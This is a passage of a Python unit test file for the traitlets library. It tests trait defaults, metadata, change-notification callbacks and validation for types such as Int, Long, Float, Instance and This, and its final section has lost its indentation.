        self.assertEqual(b.x, 20)
        self.assertEqual(b._trait_values, {'x': 20})
        c = C()
        self.assertEqual(c._trait_values, {})
        self.assertEqual(c.x, 21)
        self.assertEqual(c._trait_values, {'x': 21})
        # Ensure that the base class remains unmolested when the _default
        # initializer gets overridden in a subclass.
        a = A()
        c = C()
        self.assertEqual(a._trait_values, {})
        self.assertEqual(a.x, 11)
        self.assertEqual(a._trait_values, {'x': 11})

    def test_dynamic_initializer(self):
        # New-style @default('x') decorator.
        class A(HasTraits):
            x = Int(10)
            @default('x')
            def _default_x(self):
                return 11
        class B(A):
            x = Int(20)
        class C(A):
            @default('x')
            def _default_x(self):
                return 21
        a = A()
        self.assertEqual(a._trait_values, {})
        self.assertEqual(a.x, 11)
        self.assertEqual(a._trait_values, {'x': 11})
        b = B()
        self.assertEqual(b.x, 20)
        self.assertEqual(b._trait_values, {'x': 20})
        c = C()
        self.assertEqual(c._trait_values, {})
        self.assertEqual(c.x, 21)
        self.assertEqual(c._trait_values, {'x': 21})
        # Ensure that the base class remains unmolested when the _default
        # initializer gets overridden in a subclass.
        a = A()
        c = C()
        self.assertEqual(a._trait_values, {})
        self.assertEqual(a.x, 11)
        self.assertEqual(a._trait_values, {'x': 11})

    def test_tag_metadata(self):
        # .tag() overrides class-level metadata and adds new keys.
        class MyIntTT(TraitType):
            metadata = {'a': 1, 'b': 2}
        a = MyIntTT(10).tag(b=3, c=4)
        self.assertEqual(a.metadata, {'a': 1, 'b': 3, 'c': 4})

    def test_metadata_localized_instance(self):
        class MyIntTT(TraitType):
            metadata = {'a': 1, 'b': 2}
        a = MyIntTT(10)
        b = MyIntTT(10)
        a.metadata['c'] = 3
        # make sure that changing a's metadata didn't change b's metadata
        self.assertNotIn('c', b.metadata)

    def test_union_metadata(self):
        class Foo(HasTraits):
            bar = (Int().tag(ta=1) | Dict().tag(ta=2, ti='b')).tag(ti='a')
        foo = Foo()
        # At this point, no value has been set for bar, so value-specific
        # is not set.
        self.assertEqual(foo.trait_metadata('bar', 'ta'), None)
        self.assertEqual(foo.trait_metadata('bar', 'ti'), 'a')
        foo.bar = {}
        self.assertEqual(foo.trait_metadata('bar', 'ta'), 2)
        self.assertEqual(foo.trait_metadata('bar', 'ti'), 'b')
        foo.bar = 1
        self.assertEqual(foo.trait_metadata('bar', 'ta'), 1)
        self.assertEqual(foo.trait_metadata('bar', 'ti'), 'a')

    def test_union_default_value(self):
        class Foo(HasTraits):
            bar = Union([Dict(), Int()], default_value=1)
        foo = Foo()
        self.assertEqual(foo.bar, 1)

    def test_deprecated_metadata_access(self):
        class MyIntTT(TraitType):
            metadata = {'a': 1, 'b': 2}
        a = MyIntTT(10)
        with expected_warnings(["use the instance .metadata dictionary directly"]*2):
            a.set_metadata('key', 'value')
            v = a.get_metadata('key')
        self.assertEqual(v, 'value')
        with expected_warnings(["use the instance .help string directly"]*2):
            a.set_metadata('help', 'some help')
            v = a.get_metadata('help')
        self.assertEqual(v, 'some help')

    def test_trait_types_deprecated(self):
        with expected_warnings(["Traits should be given as instances"]):
            class C(HasTraits):
                t = Int

    def test_trait_types_list_deprecated(self):
        with expected_warnings(["Traits should be given as instances"]):
            class C(HasTraits):
                t = List(Int)

    def test_trait_types_tuple_deprecated(self):
        with expected_warnings(["Traits should be given as instances"]):
            class C(HasTraits):
                t = Tuple(Int)

    def test_trait_types_dict_deprecated(self):
        with expected_warnings(["Traits should be given as instances"]):
            class C(HasTraits):
                t = Dict(Int)
class TestHasDescriptorsMeta(TestCase):
    """Checks on the MetaHasTraits metaclass wiring."""

    def test_metaclass(self):
        self.assertEqual(type(HasTraits), MetaHasTraits)

        class A(HasTraits):
            a = Int()

        a = A()
        self.assertEqual(type(a.__class__), MetaHasTraits)
        self.assertEqual(a.a,0)
        a.a = 10
        self.assertEqual(a.a,10)

        class B(HasTraits):
            b = Int()

        b = B()
        self.assertEqual(b.b,0)
        b.b = 10
        self.assertEqual(b.b,10)

        class C(HasTraits):
            c = Int(30)

        c = C()
        self.assertEqual(c.c,30)
        c.c = 10
        self.assertEqual(c.c,10)

    def test_this_class(self):
        # this_class points at the class that declared the This trait.
        class A(HasTraits):
            t = This()
            tt = This()

        class B(A):
            tt = This()
            ttt = This()

        self.assertEqual(A.t.this_class, A)
        self.assertEqual(B.t.this_class, A)
        self.assertEqual(B.tt.this_class, B)
        self.assertEqual(B.ttt.this_class, B)
class TestHasDescriptors(TestCase):
    """setup_instance runs before descriptor instance_init hooks."""

    def test_setup_instance(self):
        class FooDescriptor(BaseDescriptor):
            def instance_init(self, inst):
                foo = inst.foo # instance should have the attr

        class HasFooDescriptors(HasDescriptors):
            fd = FooDescriptor()

            def setup_instance(self, *args, **kwargs):
                self.foo = kwargs.get('foo', None)
                super(HasFooDescriptors, self).setup_instance(*args, **kwargs)

        # Would raise AttributeError inside instance_init if ordering
        # were wrong; success is the assertion.
        hfd = HasFooDescriptors(foo='bar')
class TestHasTraitsNotify(TestCase):
    """Deprecated on_trait_change() notification API."""

    def setUp(self):
        self._notify1 = []
        self._notify2 = []

    def notify1(self, name, old, new):
        self._notify1.append((name, old, new))

    def notify2(self, name, old, new):
        self._notify2.append((name, old, new))

    def test_notify_all(self):
        class A(HasTraits):
            a = Int()
            b = Float()
        a = A()
        a.on_trait_change(self.notify1)
        # Assigning the current default does not notify.
        a.a = 0
        self.assertEqual(len(self._notify1),0)
        a.b = 0.0
        self.assertEqual(len(self._notify1),0)
        a.a = 10
        self.assertTrue(('a',0,10) in self._notify1)
        a.b = 10.0
        self.assertTrue(('b',0.0,10.0) in self._notify1)
        self.assertRaises(TraitError,setattr,a,'a','bad string')
        self.assertRaises(TraitError,setattr,a,'b','bad string')
        self._notify1 = []
        a.on_trait_change(self.notify1,remove=True)
        a.a = 20
        a.b = 20.0
        self.assertEqual(len(self._notify1),0)

    def test_notify_one(self):
        class A(HasTraits):
            a = Int()
            b = Float()
        a = A()
        a.on_trait_change(self.notify1, 'a')
        a.a = 0
        self.assertEqual(len(self._notify1),0)
        a.a = 10
        self.assertTrue(('a',0,10) in self._notify1)
        self.assertRaises(TraitError,setattr,a,'a','bad string')

    def test_subclass(self):
        class A(HasTraits):
            a = Int()
        class B(A):
            b = Float()
        b = B()
        self.assertEqual(b.a,0)
        self.assertEqual(b.b,0.0)
        b.a = 100
        b.b = 100.0
        self.assertEqual(b.a,100)
        self.assertEqual(b.b,100.0)

    def test_notify_subclass(self):
        class A(HasTraits):
            a = Int()
        class B(A):
            b = Float()
        b = B()
        b.on_trait_change(self.notify1, 'a')
        b.on_trait_change(self.notify2, 'b')
        b.a = 0
        b.b = 0.0
        self.assertEqual(len(self._notify1),0)
        self.assertEqual(len(self._notify2),0)
        b.a = 10
        b.b = 10.0
        self.assertTrue(('a',0,10) in self._notify1)
        self.assertTrue(('b',0.0,10.0) in self._notify2)

    def test_static_notify(self):
        # Magic-named _<name>_changed methods are static observers.
        class A(HasTraits):
            a = Int()
            _notify1 = []
            def _a_changed(self, name, old, new):
                self._notify1.append((name, old, new))
        a = A()
        a.a = 0
        # This is broken!!!
        self.assertEqual(len(a._notify1),0)
        a.a = 10
        self.assertTrue(('a',0,10) in a._notify1)

        class B(A):
            b = Float()
            _notify2 = []
            def _b_changed(self, name, old, new):
                self._notify2.append((name, old, new))
        b = B()
        b.a = 10
        b.b = 10.0
        self.assertTrue(('a',0,10) in b._notify1)
        self.assertTrue(('b',0.0,10.0) in b._notify2)

    def test_notify_args(self):
        # Callbacks may take 0-4 positional args; dispatch adapts.
        def callback0():
            self.cb = ()
        def callback1(name):
            self.cb = (name,)
        def callback2(name, new):
            self.cb = (name, new)
        def callback3(name, old, new):
            self.cb = (name, old, new)
        def callback4(name, old, new, obj):
            self.cb = (name, old, new, obj)

        class A(HasTraits):
            a = Int()
        a = A()
        a.on_trait_change(callback0, 'a')
        a.a = 10
        self.assertEqual(self.cb,())
        a.on_trait_change(callback0, 'a', remove=True)

        a.on_trait_change(callback1, 'a')
        a.a = 100
        self.assertEqual(self.cb,('a',))
        a.on_trait_change(callback1, 'a', remove=True)

        a.on_trait_change(callback2, 'a')
        a.a = 1000
        self.assertEqual(self.cb,('a',1000))
        a.on_trait_change(callback2, 'a', remove=True)

        a.on_trait_change(callback3, 'a')
        a.a = 10000
        self.assertEqual(self.cb,('a',1000,10000))
        a.on_trait_change(callback3, 'a', remove=True)

        a.on_trait_change(callback4, 'a')
        a.a = 100000
        self.assertEqual(self.cb,('a',10000,100000,a))
        self.assertEqual(len(a._trait_notifiers['a']['change']), 1)
        a.on_trait_change(callback4, 'a', remove=True)
        self.assertEqual(len(a._trait_notifiers['a']['change']), 0)

    def test_notify_only_once(self):
        class A(HasTraits):
            listen_to = ['a']
            a = Int(0)
            b = 0
            def __init__(self, **kwargs):
                super(A, self).__init__(**kwargs)
                self.on_trait_change(self.listener1, ['a'])
            def listener1(self, name, old, new):
                self.b += 1
        class B(A):
            c = 0
            d = 0
            def __init__(self, **kwargs):
                super(B, self).__init__(**kwargs)
                self.on_trait_change(self.listener2)
            def listener2(self, name, old, new):
                self.c += 1
            def _a_changed(self, name, old, new):
                self.d += 1
        b = B()
        b.a += 1
        # Each observer fires exactly once per change.
        self.assertEqual(b.b, b.c)
        self.assertEqual(b.b, b.d)
        b.a += 1
        self.assertEqual(b.b, b.c)
        self.assertEqual(b.b, b.d)
class TestObserveDecorator(TestCase):
    """New-style observe()/@observe notification API (change dicts)."""

    def setUp(self):
        self._notify1 = []
        self._notify2 = []

    def notify1(self, change):
        self._notify1.append(change)

    def notify2(self, change):
        self._notify2.append(change)

    def test_notify_all(self):
        class A(HasTraits):
            a = Int()
            b = Float()
        a = A()
        a.observe(self.notify1)
        # Assigning the current default does not notify.
        a.a = 0
        self.assertEqual(len(self._notify1),0)
        a.b = 0.0
        self.assertEqual(len(self._notify1),0)
        a.a = 10
        change = change_dict('a', 0, 10, a, 'change')
        self.assertTrue(change in self._notify1)
        a.b = 10.0
        change = change_dict('b', 0.0, 10.0, a, 'change')
        self.assertTrue(change in self._notify1)
        self.assertRaises(TraitError,setattr,a,'a','bad string')
        self.assertRaises(TraitError,setattr,a,'b','bad string')
        self._notify1 = []
        a.unobserve(self.notify1)
        a.a = 20
        a.b = 20.0
        self.assertEqual(len(self._notify1),0)

    def test_notify_one(self):
        class A(HasTraits):
            a = Int()
            b = Float()
        a = A()
        a.observe(self.notify1, 'a')
        a.a = 0
        self.assertEqual(len(self._notify1),0)
        a.a = 10
        change = change_dict('a', 0, 10, a, 'change')
        self.assertTrue(change in self._notify1)
        self.assertRaises(TraitError,setattr,a,'a','bad string')

    def test_subclass(self):
        class A(HasTraits):
            a = Int()
        class B(A):
            b = Float()
        b = B()
        self.assertEqual(b.a,0)
        self.assertEqual(b.b,0.0)
        b.a = 100
        b.b = 100.0
        self.assertEqual(b.a,100)
        self.assertEqual(b.b,100.0)

    def test_notify_subclass(self):
        class A(HasTraits):
            a = Int()
        class B(A):
            b = Float()
        b = B()
        b.observe(self.notify1, 'a')
        b.observe(self.notify2, 'b')
        b.a = 0
        b.b = 0.0
        self.assertEqual(len(self._notify1),0)
        self.assertEqual(len(self._notify2),0)
        b.a = 10
        b.b = 10.0
        change = change_dict('a', 0, 10, b, 'change')
        self.assertTrue(change in self._notify1)
        change = change_dict('b', 0.0, 10.0, b, 'change')
        self.assertTrue(change in self._notify2)

    def test_static_notify(self):
        # @observe('a') and @observe(All) register class-level handlers.
        class A(HasTraits):
            a = Int()
            b = Int()
            _notify1 = []
            _notify_any = []
            @observe('a')
            def _a_changed(self, change):
                self._notify1.append(change)
            @observe(All)
            def _any_changed(self, change):
                self._notify_any.append(change)
        a = A()
        a.a = 0
        self.assertEqual(len(a._notify1),0)
        a.a = 10
        change = change_dict('a', 0, 10, a, 'change')
        self.assertTrue(change in a._notify1)
        a.b = 1
        self.assertEqual(len(a._notify_any), 2)
        change = change_dict('b', 0, 1, a, 'change')
        self.assertTrue(change in a._notify_any)

        class B(A):
            b = Float()
            _notify2 = []
            @observe('b')
            def _b_changed(self, change):
                self._notify2.append(change)
        b = B()
        b.a = 10
        b.b = 10.0
        change = change_dict('a', 0, 10, b, 'change')
        self.assertTrue(change in b._notify1)
        change = change_dict('b', 0.0, 10.0, b, 'change')
        self.assertTrue(change in b._notify2)

    def test_notify_args(self):
        def callback0():
            self.cb = ()
        def callback1(change):
            self.cb = change

        class A(HasTraits):
            a = Int()
        a = A()
        a.on_trait_change(callback0, 'a')
        a.a = 10
        self.assertEqual(self.cb,())
        a.unobserve(callback0, 'a')

        a.observe(callback1, 'a')
        a.a = 100
        change = change_dict('a', 10, 100, a, 'change')
        self.assertEqual(self.cb, change)
        self.assertEqual(len(a._trait_notifiers['a']['change']), 1)
        a.unobserve(callback1, 'a')
        self.assertEqual(len(a._trait_notifiers['a']['change']), 0)

    def test_notify_only_once(self):
        class A(HasTraits):
            listen_to = ['a']
            a = Int(0)
            b = 0
            def __init__(self, **kwargs):
                super(A, self).__init__(**kwargs)
                self.observe(self.listener1, ['a'])
            def listener1(self, change):
                self.b += 1
        class B(A):
            c = 0
            d = 0
            def __init__(self, **kwargs):
                super(B, self).__init__(**kwargs)
                self.observe(self.listener2)
            def listener2(self, change):
                self.c += 1
            @observe('a')
            def _a_changed(self, change):
                self.d += 1
        b = B()
        b.a += 1
        # Each observer fires exactly once per change.
        self.assertEqual(b.b, b.c)
        self.assertEqual(b.b, b.d)
        b.a += 1
        self.assertEqual(b.b, b.c)
        self.assertEqual(b.b, b.d)
class TestHasTraits(TestCase):
    """General HasTraits API: trait_names, metadata, traits(), init."""

    def test_trait_names(self):
        class A(HasTraits):
            i = Int()
            f = Float()
        a = A()
        self.assertEqual(sorted(a.trait_names()),['f','i'])
        self.assertEqual(sorted(A.class_trait_names()),['f','i'])
        self.assertTrue(a.has_trait('f'))
        self.assertFalse(a.has_trait('g'))

    def test_trait_metadata_deprecated(self):
        # Constructor-kwarg metadata is deprecated in favour of .tag().
        with expected_warnings(['metadata should be set using the \.tag\(\) method']):
            class A(HasTraits):
                i = Int(config_key='MY_VALUE')
        a = A()
        self.assertEqual(a.trait_metadata('i','config_key'), 'MY_VALUE')

    def test_trait_metadata(self):
        class A(HasTraits):
            i = Int().tag(config_key='MY_VALUE')
        a = A()
        self.assertEqual(a.trait_metadata('i','config_key'), 'MY_VALUE')

    def test_trait_metadata_default(self):
        class A(HasTraits):
            i = Int()
        a = A()
        self.assertEqual(a.trait_metadata('i', 'config_key'), None)
        self.assertEqual(a.trait_metadata('i', 'config_key', 'default'), 'default')

    def test_traits(self):
        class A(HasTraits):
            i = Int()
            f = Float()
        a = A()
        self.assertEqual(a.traits(), dict(i=A.i, f=A.f))
        self.assertEqual(A.class_traits(), dict(i=A.i, f=A.f))

    def test_traits_metadata(self):
        class A(HasTraits):
            i = Int().tag(config_key='VALUE1', other_thing='VALUE2')
            f = Float().tag(config_key='VALUE3', other_thing='VALUE2')
            j = Int(0)
        a = A()
        self.assertEqual(a.traits(), dict(i=A.i, f=A.f, j=A.j))
        traits = a.traits(config_key='VALUE1', other_thing='VALUE2')
        self.assertEqual(traits, dict(i=A.i))
        # This passes, but it shouldn't because I am replicating a bug in
        # traits.
        traits = a.traits(config_key=lambda v: True)
        self.assertEqual(traits, dict(i=A.i, f=A.f, j=A.j))

    def test_traits_metadata_deprecated(self):
        with expected_warnings(['metadata should be set using the \.tag\(\) method']*2):
            class A(HasTraits):
                i = Int(config_key='VALUE1', other_thing='VALUE2')
                f = Float(config_key='VALUE3', other_thing='VALUE2')
                j = Int(0)
        a = A()
        self.assertEqual(a.traits(), dict(i=A.i, f=A.f, j=A.j))
        traits = a.traits(config_key='VALUE1', other_thing='VALUE2')
        self.assertEqual(traits, dict(i=A.i))
        # This passes, but it shouldn't because I am replicating a bug in
        # traits.
        traits = a.traits(config_key=lambda v: True)
        self.assertEqual(traits, dict(i=A.i, f=A.f, j=A.j))

    def test_init(self):
        class A(HasTraits):
            i = Int()
            x = Float()
        a = A(i=1, x=10.0)
        self.assertEqual(a.i, 1)
        self.assertEqual(a.x, 10.0)

    def test_positional_args(self):
        class A(HasTraits):
            i = Int(0)
            def __init__(self, i):
                super(A, self).__init__()
                self.i = i

        a = A(5)
        self.assertEqual(a.i, 5)
        # should raise TypeError if no positional arg given
        self.assertRaises(TypeError, A)
#-----------------------------------------------------------------------------
# Tests for specific trait types
#-----------------------------------------------------------------------------
class TestType(TestCase):
    """Tests for the Type trait (class-valued traits)."""

    def test_default(self):
        class B(object): pass
        class A(HasTraits):
            klass = Type(allow_none=True)

        a = A()
        self.assertEqual(a.klass, object)

        a.klass = B
        self.assertEqual(a.klass, B)
        self.assertRaises(TraitError, setattr, a, 'klass', 10)

    def test_default_options(self):
        class B(object): pass
        class C(B): pass

        class A(HasTraits):
            # Different possible combinations of options for default_value
            # and klass. default_value=None is only valid with allow_none=True.
            k1 = Type()
            k2 = Type(None, allow_none=True)
            k3 = Type(B)
            k4 = Type(klass=B)
            k5 = Type(default_value=None, klass=B, allow_none=True)
            k6 = Type(default_value=C, klass=B)

        self.assertIs(A.k1.default_value, object)
        self.assertIs(A.k1.klass, object)
        self.assertIs(A.k2.default_value, None)
        self.assertIs(A.k2.klass, object)
        self.assertIs(A.k3.default_value, B)
        self.assertIs(A.k3.klass, B)
        self.assertIs(A.k4.default_value, B)
        self.assertIs(A.k4.klass, B)
        self.assertIs(A.k5.default_value, None)
        self.assertIs(A.k5.klass, B)
        self.assertIs(A.k6.default_value, C)
        self.assertIs(A.k6.klass, B)

        a = A()
        self.assertIs(a.k1, object)
        self.assertIs(a.k2, None)
        self.assertIs(a.k3, B)
        self.assertIs(a.k4, B)
        self.assertIs(a.k5, None)
        self.assertIs(a.k6, C)

    def test_value(self):
        class B(object): pass
        class C(object): pass
        class A(HasTraits):
            klass = Type(B)

        a = A()
        self.assertEqual(a.klass, B)
        self.assertRaises(TraitError, setattr, a, 'klass', C)
        self.assertRaises(TraitError, setattr, a, 'klass', object)
        a.klass = B

    def test_allow_none(self):
        # Despite the name: verifies None is rejected without allow_none.
        class B(object): pass
        class C(B): pass
        class A(HasTraits):
            klass = Type(B)

        a = A()
        self.assertEqual(a.klass, B)
        self.assertRaises(TraitError, setattr, a, 'klass', None)
        a.klass = C
        self.assertEqual(a.klass, C)

    def test_validate_klass(self):
        class A(HasTraits):
            klass = Type('no strings allowed')

        self.assertRaises(ImportError, A)

        class A(HasTraits):
            klass = Type('rub.adub.Duck')

        self.assertRaises(ImportError, A)

    def test_validate_default(self):
        class B(object): pass
        class A(HasTraits):
            klass = Type('bad default', B)

        self.assertRaises(ImportError, A)

        class C(HasTraits):
            klass = Type(None, B)

        self.assertRaises(TraitError, C)

    def test_str_klass(self):
        # A dotted string default is resolved by import at access time.
        class A(HasTraits):
            klass = Type('ipython_genutils.ipstruct.Struct')

        from ipython_genutils.ipstruct import Struct
        a = A()
        a.klass = Struct
        self.assertEqual(a.klass, Struct)
        self.assertRaises(TraitError, setattr, a, 'klass', 10)

    def test_set_str_klass(self):
        class A(HasTraits):
            klass = Type()

        a = A(klass='ipython_genutils.ipstruct.Struct')
        from ipython_genutils.ipstruct import Struct
        self.assertEqual(a.klass, Struct)
class TestInstance(TestCase):
    """Tests for the Instance trait (instance-valued traits)."""

    def test_basic(self):
        class Foo(object): pass
        class Bar(Foo): pass
        class Bah(object): pass

        class A(HasTraits):
            inst = Instance(Foo, allow_none=True)

        a = A()
        self.assertTrue(a.inst is None)
        a.inst = Foo()
        self.assertTrue(isinstance(a.inst, Foo))
        a.inst = Bar()
        self.assertTrue(isinstance(a.inst, Foo))
        # Classes themselves (not instances) are rejected.
        self.assertRaises(TraitError, setattr, a, 'inst', Foo)
        self.assertRaises(TraitError, setattr, a, 'inst', Bar)
        self.assertRaises(TraitError, setattr, a, 'inst', Bah())

    def test_default_klass(self):
        class Foo(object): pass
        class Bar(Foo): pass
        class Bah(object): pass

        class FooInstance(Instance):
            klass = Foo

        class A(HasTraits):
            inst = FooInstance(allow_none=True)

        a = A()
        self.assertTrue(a.inst is None)
        a.inst = Foo()
        self.assertTrue(isinstance(a.inst, Foo))
        a.inst = Bar()
        self.assertTrue(isinstance(a.inst, Foo))
        self.assertRaises(TraitError, setattr, a, 'inst', Foo)
        self.assertRaises(TraitError, setattr, a, 'inst', Bar)
        self.assertRaises(TraitError, setattr, a, 'inst', Bah())

    def test_unique_default_value(self):
        # Each HasTraits instance gets its own default Instance value.
        class Foo(object): pass
        class A(HasTraits):
            inst = Instance(Foo,(),{})

        a = A()
        b = A()
        self.assertTrue(a.inst is not b.inst)

    def test_args_kw(self):
        class Foo(object):
            def __init__(self, c): self.c = c
        class Bar(object): pass
        class Bah(object):
            def __init__(self, c, d):
                self.c = c; self.d = d

        class A(HasTraits):
            inst = Instance(Foo, (10,))
        a = A()
        self.assertEqual(a.inst.c, 10)

        class B(HasTraits):
            inst = Instance(Bah, args=(10,), kw=dict(d=20))
        b = B()
        self.assertEqual(b.inst.c, 10)
        self.assertEqual(b.inst.d, 20)

        class C(HasTraits):
            inst = Instance(Foo, allow_none=True)
        c = C()
        self.assertTrue(c.inst is None)

    def test_bad_default(self):
        # No default args and no allow_none: reading raises.
        class Foo(object): pass

        class A(HasTraits):
            inst = Instance(Foo)

        a = A()
        with self.assertRaises(TraitError):
            a.inst

    def test_instance(self):
        # Instance() must be given a class, not an instance.
        class Foo(object): pass

        def inner():
            class A(HasTraits):
                inst = Instance(Foo())

        self.assertRaises(TraitError, inner)
class TestThis(TestCase):
    """Tests for the This trait (same-class instance references)."""

    def test_this_class(self):
        class Foo(HasTraits):
            this = This()

        f = Foo()
        self.assertEqual(f.this, None)
        g = Foo()
        f.this = g
        self.assertEqual(f.this, g)
        self.assertRaises(TraitError, setattr, f, 'this', 10)

    def test_this_inst(self):
        class Foo(HasTraits):
            this = This()

        f = Foo()
        f.this = Foo()
        self.assertTrue(isinstance(f.this, Foo))

    def test_subclass(self):
        class Foo(HasTraits):
            t = This()
        class Bar(Foo):
            pass
        f = Foo()
        b = Bar()
        # A This declared on the base accepts both directions.
        f.t = b
        b.t = f
        self.assertEqual(f.t, b)
        self.assertEqual(b.t, f)

    def test_subclass_override(self):
        class Foo(HasTraits):
            t = This()
        class Bar(Foo):
            t = This()
        f = Foo()
        b = Bar()
        f.t = b
        self.assertEqual(f.t, b)
        # Bar's own This only accepts Bar instances.
        self.assertRaises(TraitError, setattr, b, 't', f)

    def test_this_in_container(self):
        class Tree(HasTraits):
            value = Unicode()
            leaves = List(This())

        tree = Tree(
            value='foo',
            leaves=[Tree(value='bar'), Tree(value='buzz')]
        )

        with self.assertRaises(TraitError):
            tree.leaves = [1, 2]
class TraitTestBase(TestCase):
    """A base testing class for basic trait types.

    Subclasses set ``obj`` (a HasTraits with a 'value' trait) plus any
    of ``_default_value``, ``_good_values`` and ``_bad_values``;
    optional ``coerce`` describes how assigned values are cast.
    """

    def assign(self, value):
        self.obj.value = value

    def coerce(self, value):
        # Identity by default; casting traits override this.
        return value

    def test_good_values(self):
        if hasattr(self, '_good_values'):
            for value in self._good_values:
                self.assign(value)
                self.assertEqual(self.obj.value, self.coerce(value))

    def test_bad_values(self):
        if hasattr(self, '_bad_values'):
            for value in self._bad_values:
                try:
                    self.assertRaises(TraitError, self.assign, value)
                except AssertionError:
                    # Re-raise with the offending value as the message.
                    assert False, value

    def test_default_value(self):
        if hasattr(self, '_default_value'):
            self.assertEqual(self._default_value, self.obj.value)

    def test_allow_none(self):
        if (hasattr(self, '_bad_values') and hasattr(self, '_good_values') and
            None in self._bad_values):
            trait=self.obj.traits()['value']
            try:
                trait.allow_none = True
                self._bad_values.remove(None)
                #skip coerce. Allow None casts None to None.
                self.assign(None)
                self.assertEqual(self.obj.value,None)
                self.test_good_values()
                self.test_bad_values()
            finally:
                #tear down
                trait.allow_none = False
                self._bad_values.append(None)

    def tearDown(self):
        # restore default value after tests, if set
        if hasattr(self, '_default_value'):
            self.obj.value = self._default_value
class AnyTrait(HasTraits):
    # Any accepts every value; default is None.
    value = Any()
class AnyTraitTest(TraitTestBase):
    """Any trait: every value is a good value."""
    obj = AnyTrait()

    _default_value = None
    _good_values = [10.0, 'ten', u'ten', [10], {'ten': 10},(10,), None, 1j]
    _bad_values = []
class UnionTrait(HasTraits):
    # Accepts either a class (Type) or a Bool.
    value = Union([Type(), Bool()])
class UnionTraitTest(TraitTestBase):
    """Union of Type and Bool; initialized from a dotted class string."""
    obj = UnionTrait(value='ipython_genutils.ipstruct.Struct')
    _good_values = [int, float, True]
    _bad_values = [[], (0,), 1j]
class OrTrait(HasTraits):
    # The | operator builds a Union of the two traits.
    value = Bool() | Unicode()
class OrTraitTest(TraitTestBase):
    """Bool | Unicode union via the | operator."""
    obj = OrTrait()
    _good_values = [True, False, 'ten']
    _bad_values = [[], (0,), 1j]
class IntTrait(HasTraits):
    # Default 99, lower bound -100, no upper bound.
    value = Int(99, min=-100)
class TestInt(TraitTestBase):
    """Int: strict ints only, bounded below at -100 (see IntTrait)."""
    obj = IntTrait()
    _default_value = 99
    _good_values = [10, -10]
    _bad_values = ['ten', u'ten', [10], {'ten': 10}, (10,), None, 1j,
                   10.1, -10.1, '10L', '-10L', '10.1', '-10.1', u'10L',
                   u'-10L', u'10.1', u'-10.1', '10', '-10', u'10', -200]
    if not six.PY3:
        # On py2, longs and values beyond maxint are also rejected.
        _bad_values.extend([long(10), long(-10), 10*sys.maxint, -10*sys.maxint])
class CIntTrait(HasTraits):
    # Casting Int: the string default '5' is coerced to 5.
    value = CInt('5')
class TestCInt(TraitTestBase):
    """CInt coerces int-compatible values with int()."""
    obj = CIntTrait()

    _default_value = 5
    _good_values = ['10', '-10', u'10', u'-10', 10, 10.0, -10.0, 10.1]
    _bad_values = ['ten', u'ten', [10], {'ten': 10},(10,),
                   None, 1j, '10.1', u'10.1']

    def coerce(self, n):
        # Mirror CInt's cast so test_good_values compares post-cast.
        return int(n)
class MinBoundCIntTrait(HasTraits):
    # Casting Int with a lower bound of 3.
    value = CInt('5', min=3)
class TestMinBoundCInt(TestCInt):
    """CInt bounded below at 3 (bound checked after casting)."""
    obj = MinBoundCIntTrait()

    _default_value = 5
    _good_values = [3, 3.0, '3']
    _bad_values = [2.6, 2, -3, -3.0]
class LongTrait(HasTraits):
    # Plain int on py3; long on py2.
    value = Long(99 if six.PY3 else long(99))
class TestLong(TraitTestBase):
    """Long accepts ints/longs, rejects floats and numeric strings."""
    obj = LongTrait()

    _default_value = 99 if six.PY3 else long(99)
    _good_values = [10, -10]
    _bad_values = ['ten', u'ten', [10], {'ten': 10},(10,),
                   None, 1j, 10.1, -10.1, '10', '-10', '10L', '-10L', '10.1',
                   '-10.1', u'10', u'-10', u'10L', u'-10L', u'10.1',
                   u'-10.1']
    if not six.PY3:
        # maxint undefined on py3, because int == long
        _good_values.extend([long(10), long(-10), 10*sys.maxint, -10*sys.maxint])
        _bad_values.extend([[long(10)], (long(10),)])

    @mark.skipif(six.PY3, reason="not relevant on py3")
    def test_cast_small(self):
        """Long casts ints to long"""
        self.obj.value = 10
        self.assertEqual(type(self.obj.value), long)
class MinBoundLongTrait(HasTraits):
value = Long(99 if six.PY3 else long(99), min=5)
class TestMinBoundLong(TraitTestBase):
obj = MinBoundLongTrait()
_default_value = 99 if six.PY3 else long(99)
_good_values = [5, 10]
_bad_values = [4, -10]
class MaxBoundLongTrait(HasTraits):
value = Long(5 if six.PY3 else long(5), max=10)
class TestMaxBoundLong(TraitTestBase):
obj = MaxBoundLongTrait()
_default_value = 5 if six.PY3 else long(5)
_good_values = [10, -2]
_bad_values = [11, 20]
class CLongTrait(HasTraits):
value = CLong('5')
class TestCLong(TraitTestBase):
obj = CLongTrait()
_default_value = 5 if six.PY3 else long(5)
_good_values = ['10', '-10', u'10', u'-10', 10, 10.0, -10.0, 10.1]
_bad_values = ['ten', u'ten', [10], {'ten': 10},(10,),
None, 1j, '10.1', u'10.1']
def coerce(self, n):
return int(n) if six.PY3 else long(n)
class MaxBoundCLongTrait(HasTraits):
value = CLong('5', max=10)
class TestMaxBoundCLong(TestCLong):
obj = MaxBoundCLongTrait()
_default_value = 5 if six.PY3 else long(5)
_good_values = [10, '10', 10.3]
_bad_values = [11.0, '11']
class IntegerTrait(HasTraits):
value = Integer(1)
class TestInteger(TestLong):
obj = IntegerTrait()
_default_value = 1
def coerce(self, n):
return int(n)
@mark.skipif(six.PY3, reason="not relevant on py3")
def test_cast_small(self):
"""Integer casts small longs to int"""
self.obj.value = long(100)
self.assertEqual(type(self.obj.value), int)
class MinBoundIntegerTrait(HasTraits):
value = Integer(5, min=3)
class TestMinBoundInteger(TraitTestBase):
obj = MinBoundIntegerTrait()
_default_value = 5
_good_values = 3, 20
_bad_values = [2, -10]
class MaxBoundIntegerTrait(HasTraits):
value = Integer(1, max=3)
class TestMaxBoundInteger(TraitTestBase):
obj = MaxBoundIntegerTrait()
_default_value = 1
_good_values = 3, -2
_bad_values = [4, 10]
class FloatTrait(HasTraits):
value = Float(99.0, max=200.0)
class TestFloat(TraitTestBase):
obj = FloatTrait()
_default_value = 99.0
_good_values = [10, -10, 10.1, -10.1]
_bad_values = ['ten', u'ten', [10], {'ten': 10}, (10,), None,
1j, '10', '-10', '10L', '-10L', '10.1', '-10.1', u'10',
u'-10', u'10L', u'-10L', u'10.1', u'-10.1', 201.0]
if not six.PY3:
_bad_values.extend([long(10), long(-10)])
class CFloatTrait(HasTraits):
value = CFloat('99.0', max=200.0)
class TestCFloat(TraitTestBase):
obj = CFloatTrait()
_default_value = 99.0
_good_values = [10, 10.0, 10.5, '10.0', '10', '-10', '10.0', u'10']
